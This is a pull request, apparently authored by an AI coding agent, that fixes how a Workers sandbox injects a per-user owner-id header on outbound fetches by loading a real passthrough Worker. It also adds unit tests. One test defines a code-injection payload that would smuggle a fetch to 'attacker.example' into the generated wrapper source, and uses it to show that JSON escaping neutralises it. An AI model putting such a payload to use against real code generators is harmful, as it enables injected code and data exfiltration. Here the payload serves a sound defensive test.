### PR TITLE
fix(executor): use real Fetcher for owner-id outbound wrapper

### DIFF
--- a/src/agentic.ts
+++ b/src/agentic.ts
@@ -1715,7 +1715,7 @@ function buildTools(
     // the calling user's GitHub/GitLab tokens and falls back to no auth.
     // The HTTP `/execute` path already wraps via `runSandboxedCode`; this
     // closes the same gap for the agent-loop path. (audit follow-up F2)
-    const outbound = wrapOutboundWithOwner(env.OUTBOUND ?? null, options?.ownerId);
+    const outbound = wrapOutboundWithOwner(env.LOADER, env.OUTBOUND ?? null, options?.ownerId);
 
     const codemodeTool = createExecuteTool({
       tools: workspaceTools,

--- a/src/executor.ts
+++ b/src/executor.ts
@@ -16,6 +16,20 @@ export const OWNER_ID_HEADER = "x-dodo-owner-id";
  * Wrap the OUTBOUND service binding so every fetch() the sandbox makes
  * carries an `x-dodo-owner-id` header bound to the calling user.
  *
+ * Why a dynamically-loaded Worker rather than a plain JS object?
+ * `globalOutbound` must be a real `Fetcher` produced by the runtime —
+ * a duck-typed `{ fetch }` object cast via `as Fetcher` is rejected at
+ * runtime with:
+ *
+ *   Incorrect type for the 'globalOutbound' field on 'WorkerCode':
+ *   the provided value is not of type 'Fetcher'.
+ *
+ * `WorkerLoader.get()` returns a `WorkerStub` whose `getEntrypoint()`
+ * is a real `Fetcher` the runtime accepts. We load a tiny passthrough
+ * Worker whose own `globalOutbound` is the parent's `OUTBOUND` binding,
+ * and whose code injects `x-dodo-owner-id` before forwarding via the
+ * implicit-pass-through `fetch()` (which routes through globalOutbound).
+ *
  * Without this wrapper, AllowlistOutbound has no way to resolve which
  * user's encrypted secrets to use, so per-user GitHub/GitLab tokens
  * never reach outbound requests from codemode and the env-var fallback
@@ -26,24 +40,42 @@ export const OWNER_ID_HEADER = "x-dodo-owner-id";
  * for the HTTP `/execute` route, not for sandbox fetches issued via the
  * agent loop's `codemode` tool.
  */
-export function wrapOutboundWithOwner(outbound: Fetcher | null, ownerId: string | undefined): Fetcher | null {
+export function wrapOutboundWithOwner(
+  loader: WorkerLoader | undefined,
+  outbound: Fetcher | null,
+  ownerId: string | undefined,
+): Fetcher | null {
   if (!outbound || !ownerId) return outbound;
+  if (!loader) return outbound;
 
-  // Return a Fetcher-shaped object. Workers runtime requires the real
-  // ServiceStub at the binding level, but accepts any object exposing
-  // `fetch(...)` once codemode has captured the reference.
-  const wrapped = {
-    fetch(input: RequestInfo, init?: RequestInit): Promise<Response> {
-      const request = new Request(input, init);
-      const headers = new Headers(request.headers);
-      // Don't allow the sandboxed code to spoof the owner header — always
-      // overwrite with the server-resolved value.
-      headers.set(OWNER_ID_HEADER, ownerId);
-      return outbound.fetch(new Request(request, { headers }));
-    },
-  } as unknown as Fetcher;
+  // JSON-encode the ownerId to make string injection into the wrapper
+  // module source safe even if the value contained quotes or newlines.
+  const ownerIdLiteral = JSON.stringify(ownerId);
+  const headerLiteral = JSON.stringify(OWNER_ID_HEADER);
 
-  return wrapped;
+  const wrapperSource = `
+    export default {
+      async fetch(request) {
+        const headers = new Headers(request.headers);
+        // Server-resolved owner ID — sandboxed code cannot spoof it.
+        headers.set(${headerLiteral}, ${ownerIdLiteral});
+        return fetch(new Request(request, { headers }));
+      },
+    };
+  `;
+
+  // Stable name keyed on ownerId so repeated executions reuse the
+  // already-loaded wrapper isolate (workerd caches by name).
+  const stub = loader.get(`outbound-wrapper-${ownerId}`, () => ({
+    compatibilityDate: "2024-12-01",
+    mainModule: "wrapper.js",
+    modules: { "wrapper.js": wrapperSource },
+    // The wrapper's own outbound IS the parent's OUTBOUND binding —
+    // its top-level `fetch()` calls go straight to AllowlistOutbound.
+    globalOutbound: outbound,
+  }));
+
+  return stub.getEntrypoint();
 }
 
 export async function runSandboxedCode(input: {
@@ -61,11 +93,8 @@ export async function runSandboxedCode(input: {
     throw new Error("Dynamic Worker loader is not configured");
   }
 
-  // Pass the real OUTBOUND ServiceStub directly. The Workers runtime enforces
-  // that globalOutbound must be a Fetcher produced by a service binding —
-  // plain objects cast via `as Fetcher` fail with a type error at runtime.
   const baseOutbound = input.env.OUTBOUND ?? null;
-  const outbound = wrapOutboundWithOwner(baseOutbound, input.ownerId);
+  const outbound = wrapOutboundWithOwner(input.env.LOADER, baseOutbound, input.ownerId);
 
   const executor = new DynamicWorkerExecutor({
     globalOutbound: outbound,

--- a/test/outbound.test.ts
+++ b/test/outbound.test.ts
@@ -198,3 +198,127 @@ describe("AllowlistOutbound auth injection", () => {
     });
   });
 });
+
+// ── wrapOutboundWithOwner ────────────────────────────────────────────────
+
+import { wrapOutboundWithOwner, OWNER_ID_HEADER } from "../src/executor";
+
+describe("wrapOutboundWithOwner", () => {
+  const fakeFetcher: Fetcher = {} as Fetcher;
+  const fakeStub = { getEntrypoint: vi.fn(() => fakeFetcher) };
+
+  beforeEach(() => {
+    vi.clearAllMocks();
+  });
+
+  it("returns the original outbound unchanged when ownerId is undefined", () => {
+    const loader = { get: vi.fn() } as unknown as WorkerLoader;
+    const outbound = {} as Fetcher;
+    const result = wrapOutboundWithOwner(loader, outbound, undefined);
+    expect(result).toBe(outbound);
+    expect(loader.get).not.toHaveBeenCalled();
+  });
+
+  it("returns null unchanged when outbound is null", () => {
+    const loader = { get: vi.fn() } as unknown as WorkerLoader;
+    const result = wrapOutboundWithOwner(loader, null, "owner-1");
+    expect(result).toBeNull();
+    expect(loader.get).not.toHaveBeenCalled();
+  });
+
+  it("falls back to passthrough when loader is undefined", () => {
+    const outbound = {} as Fetcher;
+    const result = wrapOutboundWithOwner(undefined, outbound, "owner-1");
+    expect(result).toBe(outbound);
+  });
+
+  it("loads a named wrapper Worker when ownerId is provided", () => {
+    const loader = {
+      get: vi.fn(() => fakeStub),
+    } as unknown as WorkerLoader;
+    const outbound = {} as Fetcher;
+
+    const result = wrapOutboundWithOwner(loader, outbound, "owner-abc");
+
+    expect(loader.get).toHaveBeenCalledTimes(1);
+    expect(loader.get).toHaveBeenCalledWith(
+      "outbound-wrapper-owner-abc",
+      expect.any(Function),
+    );
+    expect(fakeStub.getEntrypoint).toHaveBeenCalled();
+    expect(result).toBe(fakeFetcher);
+  });
+
+  it("wrapper code passes the parent OUTBOUND as its globalOutbound", () => {
+    let capturedConfig: WorkerLoaderWorkerCode | undefined;
+    const loader = {
+      get: vi.fn((_name: string, getCode: () => WorkerLoaderWorkerCode) => {
+        capturedConfig = getCode();
+        return fakeStub;
+      }),
+    } as unknown as WorkerLoader;
+    const outbound = { __id: "outbound-marker" } as unknown as Fetcher;
+
+    wrapOutboundWithOwner(loader, outbound, "owner-xyz");
+
+    expect(capturedConfig).toBeDefined();
+    expect(capturedConfig?.globalOutbound).toBe(outbound);
+    expect(capturedConfig?.mainModule).toBe("wrapper.js");
+    expect(capturedConfig?.modules).toHaveProperty("wrapper.js");
+  });
+
+  it("wrapper code injects the OWNER_ID_HEADER with the server-resolved value", () => {
+    let capturedConfig: WorkerLoaderWorkerCode | undefined;
+    const loader = {
+      get: vi.fn((_name: string, getCode: () => WorkerLoaderWorkerCode) => {
+        capturedConfig = getCode();
+        return fakeStub;
+      }),
+    } as unknown as WorkerLoader;
+
+    wrapOutboundWithOwner(loader, {} as Fetcher, "owner-secret");
+
+    const wrapperSource = (capturedConfig?.modules ?? {})["wrapper.js"];
+    expect(typeof wrapperSource).toBe("string");
+    // Header name + ownerId both inlined as JSON-encoded literals.
+    expect(wrapperSource).toContain(JSON.stringify(OWNER_ID_HEADER));
+    expect(wrapperSource).toContain(JSON.stringify("owner-secret"));
+  });
+
+  it("safely escapes ownerId values containing quotes or newlines", () => {
+    let capturedConfig: WorkerLoaderWorkerCode | undefined;
+    const loader = {
+      get: vi.fn((_name: string, getCode: () => WorkerLoaderWorkerCode) => {
+        capturedConfig = getCode();
+        return fakeStub;
+      }),
+    } as unknown as WorkerLoader;
+
+    const evil = `"; fetch('https://attacker.example/'); //`;
+    wrapOutboundWithOwner(loader, {} as Fetcher, evil);
+
+    const wrapperSource = (capturedConfig?.modules ?? {})["wrapper.js"];
+    // The malicious payload appears only as a JSON-encoded string literal.
+    // The leading `"` is escaped to `\"`, so the closing `"` of the literal
+    // is NOT broken — the rest of the payload is interpreted as inert text.
+    expect(wrapperSource).toContain(JSON.stringify(evil));
+    // Concrete proof: the JSON literal contains the escaped quote, meaning
+    // the parser correctly stays inside the string when scanning the payload.
+    expect(wrapperSource).toContain('\\"; fetch(');
+  });
+
+  it("uses a stable name per ownerId so wrappers are reused", () => {
+    const loader = {
+      get: vi.fn(() => fakeStub),
+    } as unknown as WorkerLoader;
+
+    wrapOutboundWithOwner(loader, {} as Fetcher, "owner-1");
+    wrapOutboundWithOwner(loader, {} as Fetcher, "owner-1");
+    wrapOutboundWithOwner(loader, {} as Fetcher, "owner-2");
+
+    const calls = (loader.get as ReturnType<typeof vi.fn>).mock.calls;
+    expect(calls[0][0]).toBe("outbound-wrapper-owner-1");
+    expect(calls[1][0]).toBe("outbound-wrapper-owner-1");
+    expect(calls[2][0]).toBe("outbound-wrapper-owner-2");
+  });
+});


### PR DESCRIPTION
## Summary

- Replaces the duck-typed `globalOutbound` wrapper with a real `Fetcher` produced by `env.LOADER.get()` so workerd accepts it at runtime
- Restores codemode outbound `fetch()` for any session that has an ownerId (i.e. all real users)
- Adds 8 unit tests covering passthrough cases, named-stub loading, header injection, and JSON-escape safety

## The bug

`wrapOutboundWithOwner` in `src/executor.ts` returned a plain JS object cast `as Fetcher` so it could intercept requests and inject `x-dodo-owner-id` for `AllowlistOutbound` to read. The comment right above the cast warned that "the Workers runtime enforces that globalOutbound must be a Fetcher produced by a service binding — plain objects cast via `as Fetcher` fail with a type error at runtime" — but the code did exactly that.

Symptom: in any user session (where `ownerId` is set), every codemode `fetch()` failed with:

> Incorrect type for the 'globalOutbound' field on 'WorkerCode': the provided value is not of type 'Fetcher'.

This broke deploy verifications, external API smoke tests, and anything else that needed the sandbox to talk to the outside world. Admin sessions (no `ownerId`) sidestepped the wrap and worked fine, which is probably why the bug went unnoticed.

## The fix

Use the existing `env.LOADER` (already wired for codemode itself) to dynamically load a tiny passthrough Worker whose own `globalOutbound` is the parent's `OUTBOUND` binding. Its `getEntrypoint()` is a real `Fetcher` the runtime accepts. The loaded wrapper:

1. Sets `x-dodo-owner-id` from a JSON-encoded literal of the server-resolved ownerId (so a malicious value can't break out of the string)
2. Forwards via the implicit `fetch()`, which routes through its `globalOutbound` → `OUTBOUND` → `AllowlistOutbound`

`LOADER.get()` is keyed on `outbound-wrapper-${ownerId}`, so per-owner wrapper isolates are reused across sandbox runs.

## Tests

Added `describe("wrapOutboundWithOwner", …)` to `test/outbound.test.ts`:

- Undefined ownerId → passthrough, no loader call
- Null outbound → null, no loader call
- Undefined loader → falls back to passthrough
- Named-stub loading + getEntrypoint
- Parent OUTBOUND propagated as wrapper's globalOutbound
- Wrapper source contains the encoded header name + ownerId literal
- JSON-escape safety against ownerId injection (`"; fetch(...); //` payload stays inside the string)
- Stable name caching across calls

Full suite: 651 / 651 passing locally.

## Verification

After merge + deploy, codemode `fetch()` in a user session should work — confirmed externally that this was breaking deploy verification flows for the `deploy-worker` skill. Easy live test: have a session run `await fetch("https://example.com")` inside `codemode` and confirm it returns a 200 instead of the globalOutbound type error.

🤖 generated by ruskin's agent